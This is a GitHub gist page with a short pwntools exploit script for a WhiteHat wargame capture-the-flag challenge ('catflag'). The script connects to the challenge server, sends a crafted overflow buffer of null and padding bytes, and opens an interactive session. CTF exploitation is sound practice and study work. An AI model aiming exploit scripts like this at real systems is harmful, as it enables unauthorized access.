Skip to content

Instantly share code, notes, and snippets.

@Az-IV
Created November 2, 2017 07:43
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Az-IV/c5a8e4ca81404247a2455fbab27bbb8f to your computer and use it in GitHub Desktop.
Save Az-IV/c5a8e4ca81404247a2455fbab27bbb8f to your computer and use it in GitHub Desktop.
from pwn import *
r = remote('chall05-pwn01.wargame.whitehat.vn', 28103)
# r = process('./catflag')
# gdb.attach(r, )
r.sendline('\x00'*100+'\x46'*5+'\x47')
r.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment